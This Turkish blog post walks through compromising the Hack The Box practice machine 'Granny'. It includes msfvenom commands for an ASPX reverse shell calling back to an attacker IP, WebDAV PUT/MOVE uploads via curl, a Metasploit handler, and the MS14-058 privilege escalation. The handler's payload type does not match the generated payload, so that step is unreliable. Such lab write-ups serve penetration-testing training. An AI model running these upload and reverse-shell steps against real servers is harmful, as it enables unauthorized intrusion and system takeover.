Hack The Box: Granny Çözümü

0
467
views
Hack the Box platformu sızma testi alıştırmaları için kullanılabilecek çevrimiçi platformlardan birisidir. Bu yazıda, Hack The Box platformundaki Granny isimli Orta zorluktaki sanal makinenin ele geçirilmesi incelenecektir.

Granny sanal makinesinin IP ve işletim sistemi bilgileri aşağıdaki gibidir.

  • IP Adresi: 10.10.10.15
  • İşletim Sistemi: Windows

 

A) Port Tarama

Port taraması sonucunda TCP\80 portunun açık olduğu tespit edilmiştir.

nmap -sS -sC -sV -vv -p- -oA fulltcp –open 10.10.10.15

 

Yukarıda ekran görüntüsü verilen port tarama işlemine ait sonucu incelediğimizde hedef sistem üzerinde yalnızca TCP\80 portunun dışarıya açık olduğunu, nmap scriptlerinden biri olan “http-webdav-scan” taraması gerçekleştirildiğini ve “webDAV” sunucusu üzerinde tehlikeli HTTP metodlarının izinli olduğunu gözlemliyoruz.

Hedef sistemin tarayıcı üzerinden görüntülediğimizde aşağıda ekran görüntüsü verilen sayfa ile karşılaşılmaktadır.

 

B) Bilgi Toplama

HTTP servisine gerçekleştirilen isteğe dönen yanıt aşağıdaki gibidir.

curl -i http://10.10.10.15

 

Yukarıda ekran görüntüsü verilen hedef sisteme gerçekleştirilen isteğe dönen yanıtı incelediğimizde; hedef sisteme “aspx” dosya yükleyebilirsek çalıştırabileceğimizi tespit ediyoruz.

Uygulamadaki dizinlere gerçekleştirilen kaba kuvvet (brute force) işlemi için gobuster aracı kullanılabilir.

gobuster -u http://10.10.10.15 -w /usr/share/seclists/Discovery/Web-Content/common.txt -s ‘200,204,301,302,307,403,500’ -e -x ‘asp,aspx,html,txt’

 

Hedef sistem üzerinde gerçekleştirilen zafiyet tarama işlemi için nikto aracı kullanılabilir.

nikto –host=http://10.10.10.15

 

Hedef sistem üzerine yüklenebilir olan dosya uzantılarının tespit işlemi için davtest aracı kullanılabilir.

davtest –url http://10.10.10.15

 

Shellcode üretimi için msfvenom aracı kullanılabilir.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f aspx > shell.aspx

 

Hedef sisteme dosya yüklemek için curl aracı kullanılabilir.

curl -X PUT http://10.10.10.15/shell.txt –data-binary @shell.aspx
curl -X MOVE -H ‘Destination:http://10.10.10.15/shell.aspx’ http://10.10.10.15/shell.txt

 

Not:–data-binary” parametresini kullanmamızın sebebi eğer bu parametreyi kullanmadan direk olarak shell dosyamızı sisteme yüklersek hedefteki sunucu dosyamız içerisindeki boşlukları kaldırıyor ve dosyayı tetiklediğimizde shell elde edemiyoruz.

 

C) Zafiyetin İstismarı

Sisteme yüklediğimiz shell dosyasının çağırılması için yine curl aracı kullanılabilir.

curl http://10.10.10.15/shell.aspx

 

Talebi yakalayacak olan dinleyici için MSF multi handler istismar modülü ayarları gerçekleştirilir ve NETWORK SERVICE yetkisi ile ters bağlantı elde edilir.

service postgresql start
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.17
exploit

 

D) Yetki Yükseltme (Metasploit)

Hedef sistem üzerinde var olan işletim sistemi güncelleme eksiklikleri kaynaklı güvenlik açıklıklarının tespiti için MSF local_exploit_suggester post modülü kullanılabilir.

background
use post/multi/recon/local_exploit_suggester
set SESSION 9
exploit

 

Çıkan zafiyetlerden MS14-058 zafiyetine ait istismar modülü ile hak yükseltilir.

use exploit/windows/local/ms14_058_track_popup_menu
set LHOST 10.10.14.17
set LPORT 5555
set SESSION 9
exploit

 

Elde edilen “user.txt” dosyası aşağıdaki gibidir.

 

Elde edilen “root.txt” dosyası aşağıdaki gibidir.

 

 

Kaynaklar:

https://pentestworld.blogspot.com/2019/06/hack-box-granny.html

 

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz